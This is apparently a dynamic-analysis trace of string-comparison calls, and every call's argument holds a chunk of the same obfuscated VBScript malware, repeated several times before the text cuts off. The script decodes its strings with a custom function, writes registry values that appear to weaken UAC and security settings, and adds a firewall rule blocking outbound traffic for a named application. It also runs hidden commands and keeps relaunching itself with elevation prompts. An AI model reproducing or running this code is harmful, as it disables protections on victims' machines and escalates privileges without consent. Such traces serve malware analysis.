_MaxCount=0x21) returned 84 [0223.014] wcsncmp (_String1="teObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.014] wcsncmp (_String1="eObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.014] wcsncmp (_String1="Object(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0223.014] wcsncmp (_String1="bject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0223.014] wcsncmp (_String1="ject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 